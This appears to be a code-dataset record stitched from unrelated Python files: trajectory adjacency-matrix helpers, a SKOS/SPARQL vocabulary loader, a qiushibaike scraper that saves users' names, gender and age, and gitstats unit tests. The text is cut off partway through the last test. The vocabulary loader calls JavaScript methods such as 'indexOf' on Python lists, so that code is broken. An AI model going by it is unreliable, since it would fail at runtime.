from utils.block_diag_matrix import block_diag_irregular
from scipy.spatial import distance_matrix
def compute_adjs(args, seq_start_end):
adj_out = []
for _, (start, end) in enumerate(seq_start_end):
mat = []
for t in range(0, args.obs_len + args.pred_len):
interval = end - start
mat.append(torch.from_numpy(np.ones((interval, interval))))
adj_out.append(torch.stack(mat, 0))
return block_diag_irregular(adj_out)
def compute_adjs_knnsim(args, seq_start_end, obs_traj, pred_traj_gt):
adj_out = []
for _, (start, end) in enumerate(seq_start_end):
obs_and_pred_traj = torch.cat((obs_traj, pred_traj_gt))
knn_t = []
for t in range(0, args.obs_len + args.pred_len):
dists = distance_matrix(np.asarray(obs_and_pred_traj[t, start:end, :]),
np.asarray(obs_and_pred_traj[t, start:end, :]))
knn = np.argsort(dists, axis=1)[:, 0: min(args.top_k_neigh, dists.shape[0])]
final_dists = []
for i in range(dists.shape[0]):
knni = np.zeros((dists.shape[1],))
knni[knn[i]] = 1
final_dists.append(knni)
final_dists = np.stack(final_dists)
knn_t.append(torch.from_numpy(final_dists))
adj_out.append(torch.stack(knn_t, 0))
return block_diag_irregular(adj_out)
def compute_adjs_distsim(args, seq_start_end, obs_traj, pred_traj_gt):
adj_out = []
for _, (start, end) in enumerate(seq_start_end):
obs_and_pred_traj = torch.cat((obs_traj, pred_traj_gt))
sim_t = []
for t in range(0, args.obs_len + args.pred_len):
dists = distance_matrix(np.asarray(obs_and_pred_traj[t, start:end, :]),
np.asarray(obs_and_pred_traj[t, start:end, :]))
#sum_dist = np.sum(dists)
#dists = np.divide(dists, sum_dist)
sim = np.exp(-dists / args.sigma)
sim_t.append(torch.from_numpy(sim))
adj_out.append(torch.stack(sim_t, 0))
return block_diag_irregular(adj_out)
def compute_adjs_knnsim_pred(top_k_neigh, seq_start_end, pred_traj):
adj_out = []
for _, (start, end) in enumerate(seq_start_end):
dists = distance_matrix(np.asarray(pred_traj[start:end, :]),
np.asarray(pred_traj[start:end, :]))
knn = np.argsort(dists, axis=1)[:, 0: min(top_k_neigh, dists.shape[0])]
final_dists = []
for i in range(dists.shape[0]):
knni = np.zeros((dists.shape[1],))
knni[knn[i]] = 1
final_dists.append(knni)
final_dists = np.stack(final_dists)
adj_out.append(torch.from_numpy(final_dists))
return block_diag_irregular(adj_out)
def compute_adjs_distsim_pred(sigma, seq_start_end, pred_traj):
adj_out = []
for _, (start, end) in enumerate(seq_start_end):
dists = distance_matrix(np.asarray(pred_traj[start:end, :]),
np.asarray(pred_traj[start:end, :]))
sim = np.exp(-dists / sigma)
adj_out.append(torch.from_numpy(sim))
return block_diag_irregular(adj_out) | utils/adj_matrix.py | import torch
import numpy as np
from utils.block_diag_matrix import block_diag_irregular
from scipy.spatial import distance_matrix
def compute_adjs(args, seq_start_end):
adj_out = []
for _, (start, end) in enumerate(seq_start_end):
mat = []
for t in range(0, args.obs_len + args.pred_len):
interval = end - start
mat.append(torch.from_numpy(np.ones((interval, interval))))
adj_out.append(torch.stack(mat, 0))
return block_diag_irregular(adj_out)
def compute_adjs_knnsim(args, seq_start_end, obs_traj, pred_traj_gt):
adj_out = []
for _, (start, end) in enumerate(seq_start_end):
obs_and_pred_traj = torch.cat((obs_traj, pred_traj_gt))
knn_t = []
for t in range(0, args.obs_len + args.pred_len):
dists = distance_matrix(np.asarray(obs_and_pred_traj[t, start:end, :]),
np.asarray(obs_and_pred_traj[t, start:end, :]))
knn = np.argsort(dists, axis=1)[:, 0: min(args.top_k_neigh, dists.shape[0])]
final_dists = []
for i in range(dists.shape[0]):
knni = np.zeros((dists.shape[1],))
knni[knn[i]] = 1
final_dists.append(knni)
final_dists = np.stack(final_dists)
knn_t.append(torch.from_numpy(final_dists))
adj_out.append(torch.stack(knn_t, 0))
return block_diag_irregular(adj_out)
def compute_adjs_distsim(args, seq_start_end, obs_traj, pred_traj_gt):
adj_out = []
for _, (start, end) in enumerate(seq_start_end):
obs_and_pred_traj = torch.cat((obs_traj, pred_traj_gt))
sim_t = []
for t in range(0, args.obs_len + args.pred_len):
dists = distance_matrix(np.asarray(obs_and_pred_traj[t, start:end, :]),
np.asarray(obs_and_pred_traj[t, start:end, :]))
#sum_dist = np.sum(dists)
#dists = np.divide(dists, sum_dist)
sim = np.exp(-dists / args.sigma)
sim_t.append(torch.from_numpy(sim))
adj_out.append(torch.stack(sim_t, 0))
return block_diag_irregular(adj_out)
def compute_adjs_knnsim_pred(top_k_neigh, seq_start_end, pred_traj):
adj_out = []
for _, (start, end) in enumerate(seq_start_end):
dists = distance_matrix(np.asarray(pred_traj[start:end, :]),
np.asarray(pred_traj[start:end, :]))
knn = np.argsort(dists, axis=1)[:, 0: min(top_k_neigh, dists.shape[0])]
final_dists = []
for i in range(dists.shape[0]):
knni = np.zeros((dists.shape[1],))
knni[knn[i]] = 1
final_dists.append(knni)
final_dists = np.stack(final_dists)
adj_out.append(torch.from_numpy(final_dists))
return block_diag_irregular(adj_out)
def compute_adjs_distsim_pred(sigma, seq_start_end, pred_traj):
adj_out = []
for _, (start, end) in enumerate(seq_start_end):
dists = distance_matrix(np.asarray(pred_traj[start:end, :]),
np.asarray(pred_traj[start:end, :]))
sim = np.exp(-dists / sigma)
adj_out.append(torch.from_numpy(sim))
return block_diag_irregular(adj_out) | 0.560734 | 0.4575 |
from SPARQLTransformer import sparqlTransformer
from .lemma import Lemma
SKOS = 'http://www.w3.org/2004/02/skos/core#'
class Vocabulary:
list = {}
@classmethod
def createVocabulary(cls, name, trunkNamespace, namespaces, prop, lang):
Vocabulary.add(name, Vocabulary(name, trunkNamespace, namespaces, prop, lang))
@classmethod
def add(cls, name, vocabulary):
Vocabulary.list[name] = vocabulary
@classmethod
def load(cls, name, schema, endpoint):
query = {
'@context': SKOS,
'@graph': [{
'@type': 'Concept',
'@id': '?id',
'prefLabel': '$skos:prefLabel$required',
'altLabel': '$skos:altLabel|skos:hiddenLabel',
'exactMatch': '$skos:exactMatch',
'inScheme': '?namespace',
}],
'$where': '{ ?id skos:inScheme|skos:topConceptOf ?namespace } UNION { ?namespace skos:member ?id}',
'$values': {
'namespace': schema,
},
'$prefixes': {
'skos': 'http://www.w3.org/2004/02/skos/core#'
}
}
options = {
'endpoint': endpoint,
'debug': False}
result = sparqlTransformer(query, options)
if isinstance(schema, list):
result['@graph'].sort(key=lambda _x: schema.indexOf(_x))
def search_id(ex):
lemma = next((l for l in result['@graph'] if l['@id'] == ex), None)
if lemma:
result['@graph'].pop(result['@graph'].indexOf(lemma))
return lemma
return ex
for x in result['@graph']:
if 'exactMatch' in x:
if x not in result['@graph']:
continue
exm = x['exactMatch']
if not isinstance(exm, list):
exm = [exm]
x.exactMatch = [search_id(ex) for ex in exm]
voc = Vocabulary(result, schema)
Vocabulary.add(name, voc)
return voc
@classmethod
def get_all(cls, name, scheme, endpoint):
if name not in Vocabulary.list:
Vocabulary.load(name, scheme, endpoint)
return Vocabulary.list[name]
def __init__(self, data, family=None):
self.family = family
if isinstance(data, list):
self.lemmata = data
return
self.lemmata = [Lemma(l) for l in data['@graph']]
def flatten(self, lang='en'):
return [l.flatten(lang) for l in self.lemmata]
def get_data(self):
return {
'@context': SKOS,
'@graph': [l.data for l in self.lemmata]
}
def get(self, _id):
return Vocabulary([l for l in self.lemmata if l.id == _id])
def autocomplete(self, q, lang, n=10):
return self.search(q, lang, n, True)
def search(self, q, lang, n=10, autocomplete=False):
matches = [Lemma(l.data, l.similar_to(q, lang, autocomplete)) for l in self.lemmata]
matches.sort(key=lambda a: -a.score)
matches = [a for a in matches if a.score][0:n]
return Vocabulary(matches) | populate/entities/vocabularies/vocabulary.py | from SPARQLTransformer import sparqlTransformer
from .lemma import Lemma
SKOS = 'http://www.w3.org/2004/02/skos/core#'
class Vocabulary:
list = {}
@classmethod
def createVocabulary(cls, name, trunkNamespace, namespaces, prop, lang):
Vocabulary.add(name, Vocabulary(name, trunkNamespace, namespaces, prop, lang))
@classmethod
def add(cls, name, vocabulary):
Vocabulary.list[name] = vocabulary
@classmethod
def load(cls, name, schema, endpoint):
query = {
'@context': SKOS,
'@graph': [{
'@type': 'Concept',
'@id': '?id',
'prefLabel': '$skos:prefLabel$required',
'altLabel': '$skos:altLabel|skos:hiddenLabel',
'exactMatch': '$skos:exactMatch',
'inScheme': '?namespace',
}],
'$where': '{ ?id skos:inScheme|skos:topConceptOf ?namespace } UNION { ?namespace skos:member ?id}',
'$values': {
'namespace': schema,
},
'$prefixes': {
'skos': 'http://www.w3.org/2004/02/skos/core#'
}
}
options = {
'endpoint': endpoint,
'debug': False}
result = sparqlTransformer(query, options)
if isinstance(schema, list):
result['@graph'].sort(key=lambda _x: schema.indexOf(_x))
def search_id(ex):
lemma = next((l for l in result['@graph'] if l['@id'] == ex), None)
if lemma:
result['@graph'].pop(result['@graph'].indexOf(lemma))
return lemma
return ex
for x in result['@graph']:
if 'exactMatch' in x:
if x not in result['@graph']:
continue
exm = x['exactMatch']
if not isinstance(exm, list):
exm = [exm]
x.exactMatch = [search_id(ex) for ex in exm]
voc = Vocabulary(result, schema)
Vocabulary.add(name, voc)
return voc
@classmethod
def get_all(cls, name, scheme, endpoint):
if name not in Vocabulary.list:
Vocabulary.load(name, scheme, endpoint)
return Vocabulary.list[name]
def __init__(self, data, family=None):
self.family = family
if isinstance(data, list):
self.lemmata = data
return
self.lemmata = [Lemma(l) for l in data['@graph']]
def flatten(self, lang='en'):
return [l.flatten(lang) for l in self.lemmata]
def get_data(self):
return {
'@context': SKOS,
'@graph': [l.data for l in self.lemmata]
}
def get(self, _id):
return Vocabulary([l for l in self.lemmata if l.id == _id])
def autocomplete(self, q, lang, n=10):
return self.search(q, lang, n, True)
def search(self, q, lang, n=10, autocomplete=False):
matches = [Lemma(l.data, l.similar_to(q, lang, autocomplete)) for l in self.lemmata]
matches.sort(key=lambda a: -a.score)
matches = [a for a in matches if a.score][0:n]
return Vocabulary(matches) | 0.702122 | 0.205117 |
import requests
from lxml import etree
import json
class Qiushi(object):
def __init__(self):
self.url = 'https://www.qiushibaike.com/8hr/page/{}/'
self.url_list = None
self.headers = {
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.162 Safari/537.36'
}
self.file = open('qiushi.json', 'w')
# 定义方法,用来生成url列表
def generate_url_list(self):
# 使用列表推导式生成url列表
# 总共 13 页 for i in range(1, 4)
self.url_list = [self.url.format(i) for i in range(1, 14)]
print(self.url_list)
# 发送请求
def get_data(self, url):
response = requests.get(url, headers=self.headers)
return response.content
# 解析数据
def parse_data(self, data):
# 实例化etree 对象
html = etree.HTML(data)
# 提取响应数据的节点列表
node_list = html.xpath('//*[contains(@id, "qiushi_tag_")]')
# print(len(node_list))
data_list = []
# 遍历节点列表
for node in node_list:
temp = {}
# 存储用户名信息
try:
# strip去除字符串边的不可见字符
temp['user'] = node.xpath('./div[1]/a[2]/h2/text()')[0].strip()
# 存储户用户的个人空间链接
temp['link'] = 'https://www.qiushibaike.com/' + node.xpath('./div[1]/a[2]/h2/@href')[0]
# 存储用户的性别,包含在div的class属性中,需要进行字符串的处理
temp['gender'] = node.xpath('./div[1]/div/@class')[0].split(' ')[-1].replace('Icon',' ')
# 存储用户的年龄
temp['age'] = node.xpath('./div[1]/div/text()')[0]
except:
temp['usr'] = '匿名用户'
temp['link'] = None
temp['gender'] = None
temp['age'] = None
data_list.append(temp)
# 返回数据
return data_list
# 保存数据
def save_data(self, data_list):
for data in data_list:
str_data = json.dumps(data, ensure_ascii=False) + '.\n'
self.file.write(str_data)
def __del__(self):
self.file.close()
def run(self):
# 构造请求url和请求头
# 生成url 列表
self.generate_url_list()
# 循环执行发送请求,传入生成的url列表中的具体页数
for url in self.url_list:
# 发送请求 获取响应
data = self.get_data(url)
# 解析数据
data_list = self.parse_data(data)
# 保存数据,如果相应数据是json字符串,想要获取指定数据的时候,一般需要转成字典,提取数据
self.save_data(data_list)
pass
if __name__ == '__main__':
qiushi = Qiushi()
qiushi.run() | day05/qiushibaike.py | import requests
from lxml import etree
import json
class Qiushi(object):
def __init__(self):
self.url = 'https://www.qiushibaike.com/8hr/page/{}/'
self.url_list = None
self.headers = {
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.162 Safari/537.36'
}
self.file = open('qiushi.json', 'w')
# 定义方法,用来生成url列表
def generate_url_list(self):
# 使用列表推导式生成url列表
# 总共 13 页 for i in range(1, 4)
self.url_list = [self.url.format(i) for i in range(1, 14)]
print(self.url_list)
# 发送请求
def get_data(self, url):
response = requests.get(url, headers=self.headers)
return response.content
# 解析数据
def parse_data(self, data):
# 实例化etree 对象
html = etree.HTML(data)
# 提取响应数据的节点列表
node_list = html.xpath('//*[contains(@id, "qiushi_tag_")]')
# print(len(node_list))
data_list = []
# 遍历节点列表
for node in node_list:
temp = {}
# 存储用户名信息
try:
# strip去除字符串边的不可见字符
temp['user'] = node.xpath('./div[1]/a[2]/h2/text()')[0].strip()
# 存储户用户的个人空间链接
temp['link'] = 'https://www.qiushibaike.com/' + node.xpath('./div[1]/a[2]/h2/@href')[0]
# 存储用户的性别,包含在div的class属性中,需要进行字符串的处理
temp['gender'] = node.xpath('./div[1]/div/@class')[0].split(' ')[-1].replace('Icon',' ')
# 存储用户的年龄
temp['age'] = node.xpath('./div[1]/div/text()')[0]
except:
temp['usr'] = '匿名用户'
temp['link'] = None
temp['gender'] = None
temp['age'] = None
data_list.append(temp)
# 返回数据
return data_list
# 保存数据
def save_data(self, data_list):
for data in data_list:
str_data = json.dumps(data, ensure_ascii=False) + '.\n'
self.file.write(str_data)
def __del__(self):
self.file.close()
def run(self):
# 构造请求url和请求头
# 生成url 列表
self.generate_url_list()
# 循环执行发送请求,传入生成的url列表中的具体页数
for url in self.url_list:
# 发送请求 获取响应
data = self.get_data(url)
# 解析数据
data_list = self.parse_data(data)
# 保存数据,如果相应数据是json字符串,想要获取指定数据的时候,一般需要转成字典,提取数据
self.save_data(data_list)
pass
if __name__ == '__main__':
qiushi = Qiushi()
qiushi.run() | 0.079642 | 0.133641 |
import json
import subprocess
from . import collectors
class CompletedProcessMock:
def __init__(self, stdout='', stderr=''):
self.stdout = stdout
self.stderr = stderr
blame_text = """\
aacd7f517fb0312ec73f882a345d50c6e8512405 1 1 1
author <NAME>
...
filename file.txt
line one
4cbb5a68de251bf42ecfc2b127fd2596c0d17d3f 1 2 1
author <NAME>
...
filename file.txt
line two
""" # flake8: noqa
shortlog_text = """\
1528753992 dcc3c393 M Nasimul Haque
1 file changed, 1 insertion(+), 1 deletion(-)
1528753813 a36e16b3 M Nasimul Haque
1 file changed, 3 insertions(+)
"""
def assert_subprocess_run(cmd):
assert subprocess.run.call_count == 1
subprocess.run.assert_any_call(
f'nice -n 20 {cmd}', cwd='/tmp', check=True, shell=True,
stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True
)
def test_clone(mocker):
mocker.patch('subprocess.run')
collectors.clone('/tmp', 'foo', 'bar')
assert_subprocess_run('git clone bar foo')
def test_clone_on_exception(mocker):
run = mocker.patch('subprocess.run')
run.side_effect = Exception('failed')
collectors.clone('/tmp', 'foo', 'bar')
assert_subprocess_run('git clone bar foo')
def test_get_timestamp(mocker):
run = mocker.patch('subprocess.run')
run.return_value = CompletedProcessMock('123456')
result = {'timestamp': 123456, 'revision': 'bar'}
assert collectors.get_timestamp('/', 'tmp', 'bar') == result
assert_subprocess_run('git log --pretty=format:"%at" -n 1 bar')
def test_get_blame(mocker):
run = mocker.patch('subprocess.run')
run.return_value = CompletedProcessMock(blame_text)
result = {'authors': {'<NAME>': 2}, 'file': 'file.txt'}
assert collectors.get_blame('/', 'tmp', False, 'file.txt') == result
assert_subprocess_run('git blame --line-porcelain -w file.txt')
def test_get_blame_detect_move(mocker):
run = mocker.patch('subprocess.run')
run.return_value = CompletedProcessMock(blame_text)
result = {'authors': {'<NAME>': 2}, 'file': 'file.txt'}
assert collectors.get_blame('/', 'tmp', True, 'file.txt') == result
assert_subprocess_run('git blame --line-porcelain -C -C -C -M -w file.txt')
def test_get_blame_on_exception(mocker):
run = mocker.patch('subprocess.run')
run.side_effect = Exception('failed')
result = {'authors': {}, 'file': 'file.txt'}
assert collectors.get_blame('/', 'tmp', False, 'file.txt') == result
assert_subprocess_run('git blame --line-porcelain -w file.txt')
def test_get_branches(mocker):
run = mocker.patch('subprocess.run')
run.return_value = CompletedProcessMock('b1\nb2\nb3 HEAD')
result = {'branches': ['b1', 'b2'], 'repo': 'tmp'}
assert collectors.get_branches('/', 'tmp') == result
assert_subprocess_run('git branch -r')
def test_get_tags(mocker):
run = mocker.patch('subprocess.run')
run.return_value = CompletedProcessMock('123 b1\n456 b2')
result = {
'tags': [
{'revision': '123', 'tag': 'b1'},
{'revision': '456', 'tag': 'b2'},
],
'repo': 'tmp',
}
assert collectors.get_tags('/', 'tmp') == result
assert_subprocess_run('git show-ref --tags')
def test_get_tags_on_exception(mocker):
run = mocker.patch('subprocess.run')
run.side_effect = Exception('failed')
result = {'repo': 'tmp', 'tags': []}
assert collectors.get_tags('/', 'tmp') == result
assert_subprocess_run('git show-ref --tags')
def test_num_files(mocker):
run = mocker.patch('subprocess.run')
run.return_value = CompletedProcessMock('f1\nf2')
result = {'12345': {'files': 2, 'timestamp': 12345}}
revision = {'revision': '12345', 'timestamp': 12345}
assert collectors.num_files('/', 'tmp', revision) == result
assert_subprocess_run('git ls-tree -r --name-only 12345')
def test_count_lines(mocker):
run = mocker.patch('subprocess.run')
run.return_value = CompletedProcessMock('{"lines": "data from cloc"}')
result = {'data': {'lines': {'lines': 'data from cloc'}}, 'repo': 'tmp'}
assert collectors.count_lines('/', 'tmp') == result
assert_subprocess_run('cloc --vcs git --json')
def test_count_lines_on_exception(mocker):
run = mocker.patch('subprocess.run')
run.side_effect = Exception('failed')
result = {'data': {'lines': []}, 'repo': 'tmp'}
assert collectors.count_lines('/', 'tmp') == result
assert_subprocess_run('cloc --vcs git --json')
def test_activity(mocker):
run = mocker.patch('subprocess.run')
run.return_value = CompletedProcessMock(shortlog_text)
result = {
'data': {
'authors_age': {
'<NAME>': {
'days': 1,
'first_commit': 1528753813,
'last_commit': 1528753992,
},
},
'by_authors': {
'<NAME>': {
'at_hour': {
'commits': {'22': 2},
'deletions': {'22': 1},
'insertions': {'22': 4},
},
'daily': {
'commits': {'2018-06-11': 2},
'deletions': {'2018-06-11': 1},
'insertions': {'2018-06-11': 4},
},
'monthly': {
'commits': {'2018-06': 2},
'deletions': {'2018-06': 1},
'insertions': {'2018-06': 4},
},
'weekly': {
'commits': {'2018-24': 2},
'deletions': {'2018-24': 1},
'insertions': {'2018-24': 4},
},
'yearly': {
'commits': {'2018': 2},
'deletions': {'2018': 1},
'insertions': {'2018': 4},
},
}
},
'by_time': {
'at_hour': {
'commits': {'22': 2},
'deletions': {'22': 1},
'insertions': {'22': 4},
},
'daily': {
'commits': {'2018-06-11': 2},
'deletions': {'2018-06-11': 1},
'insertions': {'2018-06-11': 4},
},
'monthly': {
'commits': {'2018-06': 2},
'deletions': {'2018-06': 1},
'insertions': {'2018-06': 4},
},
'weekly': {
'commits': {'2018-24': 2},
'deletions': {'2018-24': 1},
'insertions': {'2018-24': 4},
},
'yearly': {
'commits': {'2018': 2},
'deletions': {'2018': 1},
'insertions': {'2018': 4},
},
},
'hour_of_week': {'0': {'22': 2}},
},
'repo': 'tmp',
'revisions': [
{'revision': 'dcc3c393', 'timestamp': 1528753992},
{'revision': 'a36e16b3', 'timestamp': 1528753813},
],
}
assert json.loads(json.dumps(collectors.activity('/', 'tmp'))) == result
assert_subprocess_run('git log --shortstat --pretty=format:"%at %T %aN" HEAD')
def test_summary(mocker):
run = mocker.patch('subprocess.run')
run.side_effect = [
# empty sha generator
CompletedProcessMock('1234'),
# diff --shortstat
CompletedProcessMock(' 98 files changed, 10564 insertions(+)'),
# shortlog -s
CompletedProcessMock(' 93 M <NAME>'),
# rev-list --count HEAD
CompletedProcessMock('93'),
# branch -r
CompletedProcessMock('origin/master'),
# log --reverse %at
CompletedProcessMock('1527621944\n1527761990\n1527763244'),
# log %at -n1
CompletedProcessMock('1528755935'),
# show-ref --tags
CompletedProcessMock('refs/tags/v1'),
]
result = {
'data': [
{'key': 'files', 'value': '98'},
{'key': 'lines', 'notes': 'includes empty lines', 'value': '10564'},
{'key': 'authors', 'value': 1},
{'key': 'commits', 'notes': 'master only', 'value': '93'},
{'key': 'branches', 'value': 1},
{'key': 'tags', 'value': 1},
{'key': 'age', 'notes': 'active days since creation', 'value': 14}],
'repo': 'tmp',
}
assert collectors.summary('/', 'tmp') == result
def test_summary_on_exception(mocker):
run = mocker.patch('subprocess.run')
run.side_effect = [
# empty sha generator
CompletedProcessMock('1234'),
# diff --shortstat
CompletedProcessMock(' 98 files changed, 10564 insertions(+)'),
# shortlog -s
CompletedProcessMock(' 93 <NAME>'),
# rev-list --count HEAD
CompletedProcessMock('93'),
# branch -r
CompletedProcessMock('origin/master'),
# log --reverse %at
CompletedProcessMock('1527621944\n1527761990\n1527763244'),
# log %at -n1
CompletedProcessMock('1528755935'),
# show-ref --tags
Exception('refs/tags/v1'),
]
result = {
'data': [
{'key': 'files', 'value': '98'},
{'key': 'lines', 'notes': 'includes empty lines', 'value': '10564'},
{'key': 'authors', 'value': 1},
{'key': 'commits', 'notes': 'master only', 'value': '93'},
{'key': 'branches', 'value': 1},
{'key': 'tags', 'value': 0},
{'key': 'age', 'notes': 'active days since creation', 'value': 14}],
'repo': 'tmp',
}
assert collectors.summary('/', 'tmp') == result
def test_update_repo(mocker):
run = mocker.patch('subprocess.run')
run.side_effect = [
# clone
CompletedProcessMock(''),
# pull --tags
CompletedProcessMock(''),
# log --pretty=format:"%H %at %aN" -n1
CompletedProcessMock('head 23456 author'),
# log --reverse --pretty=format:"%at"
CompletedProcessMock('12345'),
]
result = {
'HEAD': 'head',
'author': 'author',
'date': 23456,
'name': 'tmp',
'start_date': 12345,
}
assert collectors.update_repo('/', ['tmp', 'https://example.com']) == result
def test_update_repo_on_exception(mocker):
run = mocker.patch('subprocess.run')
run.side_effect = Exception('')
assert collectors.update_repo('/', ['tmp', 'https://example.com']) == {} | gitstats/test_collectors.py | import json
import subprocess
from . import collectors
class CompletedProcessMock:
def __init__(self, stdout='', stderr=''):
self.stdout = stdout
self.stderr = stderr
blame_text = """\
aacd7f517fb0312ec73f882a345d50c6e8512405 1 1 1
author <NAME>
...
filename file.txt
line one
4cbb5a68de251bf42ecfc2b127fd2596c0d17d3f 1 2 1
author <NAME>
...
filename file.txt
line two
""" # flake8: noqa
shortlog_text = """\
1528753992 dcc3c393 M Nasimul Haque
1 file changed, 1 insertion(+), 1 deletion(-)
1528753813 a36e16b3 M Nasimul Haque
1 file changed, 3 insertions(+)
"""
def assert_subprocess_run(cmd):
assert subprocess.run.call_count == 1
subprocess.run.assert_any_call(
f'nice -n 20 {cmd}', cwd='/tmp', check=True, shell=True,
stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True
)
def test_clone(mocker):
mocker.patch('subprocess.run')
collectors.clone('/tmp', 'foo', 'bar')
assert_subprocess_run('git clone bar foo')
def test_clone_on_exception(mocker):
run = mocker.patch('subprocess.run')
run.side_effect = Exception('failed')
collectors.clone('/tmp', 'foo', 'bar')
assert_subprocess_run('git clone bar foo')
def test_get_timestamp(mocker):
run = mocker.patch('subprocess.run')
run.return_value = CompletedProcessMock('123456')
result = {'timestamp': 123456, 'revision': 'bar'}
assert collectors.get_timestamp('/', 'tmp', 'bar') == result
assert_subprocess_run('git log --pretty=format:"%at" -n 1 bar')
def test_get_blame(mocker):
run = mocker.patch('subprocess.run')
run.return_value = CompletedProcessMock(blame_text)
result = {'authors': {'<NAME>': 2}, 'file': 'file.txt'}
assert collectors.get_blame('/', 'tmp', False, 'file.txt') == result
assert_subprocess_run('git blame --line-porcelain -w file.txt')
def test_get_blame_detect_move(mocker):
run = mocker.patch('subprocess.run')
run.return_value = CompletedProcessMock(blame_text)
result = {'authors': {'<NAME>': 2}, 'file': 'file.txt'}
assert collectors.get_blame('/', 'tmp', True, 'file.txt') == result
assert_subprocess_run('git blame --line-porcelain -C -C -C -M -w file.txt')
def test_get_blame_on_exception(mocker):
run = mocker.patch('subprocess.run')
run.side_effect = Exception('failed')
result = {'authors': {}, 'file': 'file.txt'}
assert collectors.get_blame('/', 'tmp', False, 'file.txt') == result
assert_subprocess_run('git blame --line-porcelain -w file.txt')
def test_get_branches(mocker):
run = mocker.patch('subprocess.run')
run.return_value = CompletedProcessMock('b1\nb2\nb3 HEAD')
result = {'branches': ['b1', 'b2'], 'repo': 'tmp'}
assert collectors.get_branches('/', 'tmp') == result
assert_subprocess_run('git branch -r')
def test_get_tags(mocker):
run = mocker.patch('subprocess.run')
run.return_value = CompletedProcessMock('123 b1\n456 b2')
result = {
'tags': [
{'revision': '123', 'tag': 'b1'},
{'revision': '456', 'tag': 'b2'},
],
'repo': 'tmp',
}
assert collectors.get_tags('/', 'tmp') == result
assert_subprocess_run('git show-ref --tags')
def test_get_tags_on_exception(mocker):
run = mocker.patch('subprocess.run')
run.side_effect = Exception('failed')
result = {'repo': 'tmp', 'tags': []}
assert collectors.get_tags('/', 'tmp') == result
assert_subprocess_run('git show-ref --tags')
def test_num_files(mocker):
run = mocker.patch('subprocess.run')
run.return_value = CompletedProcessMock('f1\nf2')
result = {'12345': {'files': 2, 'timestamp': 12345}}
revision = {'revision': '12345', 'timestamp': 12345}
assert collectors.num_files('/', 'tmp', revision) == result
assert_subprocess_run('git ls-tree -r --name-only 12345')
def test_count_lines(mocker):
run = mocker.patch('subprocess.run')
run.return_value = CompletedProcessMock('{"lines": "data from cloc"}')
result = {'data': {'lines': {'lines': 'data from cloc'}}, 'repo': 'tmp'}
assert collectors.count_lines('/', 'tmp') == result
assert_subprocess_run('cloc --vcs git --json')
def test_count_lines_on_exception(mocker):
run = mocker.patch('subprocess.run')
run.side_effect = Exception('failed')
result = {'data': {'lines': []}, 'repo': 'tmp'}
assert collectors.count_lines('/', 'tmp') == result
assert_subprocess_run('cloc --vcs git --json')
def test_activity(mocker):
run = mocker.patch('subprocess.run')
run.return_value = CompletedProcessMock(shortlog_text)
result = {
'data': {
'authors_age': {
'<NAME>': {
'days': 1,
'first_commit': 1528753813,
'last_commit': 1528753992,
},
},
'by_authors': {
'<NAME>': {
'at_hour': {
'commits': {'22': 2},
'deletions': {'22': 1},
'insertions': {'22': 4},
},
'daily': {
'commits': {'2018-06-11': 2},
'deletions': {'2018-06-11': 1},
'insertions': {'2018-06-11': 4},
},
'monthly': {
'commits': {'2018-06': 2},
'deletions': {'2018-06': 1},
'insertions': {'2018-06': 4},
},
'weekly': {
'commits': {'2018-24': 2},
'deletions': {'2018-24': 1},
'insertions': {'2018-24': 4},
},
'yearly': {
'commits': {'2018': 2},
'deletions': {'2018': 1},
'insertions': {'2018': 4},
},
}
},
'by_time': {
'at_hour': {
'commits': {'22': 2},
'deletions': {'22': 1},
'insertions': {'22': 4},
},
'daily': {
'commits': {'2018-06-11': 2},
'deletions': {'2018-06-11': 1},
'insertions': {'2018-06-11': 4},
},
'monthly': {
'commits': {'2018-06': 2},
'deletions': {'2018-06': 1},
'insertions': {'2018-06': 4},
},
'weekly': {
'commits': {'2018-24': 2},
'deletions': {'2018-24': 1},
'insertions': {'2018-24': 4},
},
'yearly': {
'commits': {'2018': 2},
'deletions': {'2018': 1},
'insertions': {'2018': 4},
},
},
'hour_of_week': {'0': {'22': 2}},
},
'repo': 'tmp',
'revisions': [
{'revision': 'dcc3c393', 'timestamp': 1528753992},
{'revision': 'a36e16b3', 'timestamp': 1528753813},
],
}
assert json.loads(json.dumps(collectors.activity('/', 'tmp'))) == result
assert_subprocess_run('git log --shortstat --pretty=format:"%at %T %aN" HEAD')
def test_summary(mocker):
run = mocker.patch('subprocess.run')
run.side_effect = [
# empty sha generator
CompletedProcessMock('1234'),
# diff --shortstat
CompletedProcessMock(' 98 files changed, 10564 insertions(+)'),
# shortlog -s
CompletedProcessMock(' 93 M <NAME>'),
# rev-list --count HEAD
CompletedProcessMock('93'),
# branch -r
CompletedProcessMock('origin/master'),
# log --reverse %at
CompletedProcessMock('1527621944\n1527761990\n1527763244'),
# log %at -n1
CompletedProcessMock('1528755935'),
# show-ref --tags
CompletedProcessMock('refs/tags/v1'),
]
result = {
'data': [
{'key': 'files', 'value': '98'},
{'key': 'lines', 'notes': 'includes empty lines', 'value': '10564'},
{'key': 'authors', 'value': 1},
{'key': 'commits', 'notes': 'master only', 'value': '93'},
{'key': 'branches', 'value': 1},
{'key': 'tags', 'value': 1},
{'key': 'age', 'notes': 'active days since creation', 'value': 14}],
'repo': 'tmp',
}
assert collectors.summary('/', 'tmp') == result
def test_summary_on_exception(mocker):
run = mocker.patch('subprocess.run')
run.side_effect = [
# empty sha generator
CompletedProcessMock('1234'),
# diff --shortstat
CompletedProcessMock(' 98 files changed, 10564 insertions(+)'),
# shortlog -s
CompletedProcessMock(' 93 <NAME>'),
# rev-list --count HEAD
CompletedProcessMock('93'),
# branch -r
CompletedProcessMock('origin/master'),
# log --reverse %at
CompletedProcessMock('1527621944\n1527761990\n1527763244'),
# log %at -n1
CompletedProcessMock('1528755935'),
# show-ref --tags
Exception('refs/tags/v1'),
]
result = {
'data': [
{'key': 'files', 'value': '98'},
{'key': 'lines', 'notes': 'includes empty lines', 'value': '10564'},
{'key': 'authors', 'value': 1},
{'key': 'commits', 'notes': 'master only', 'value': '93'},
{'key': 'branches', 'value': 1},
{'key': 'tags', 'value': 0},
{'key': 'age', 'notes': 'active days since creation', 'value': 14}],
'repo': 'tmp',
}
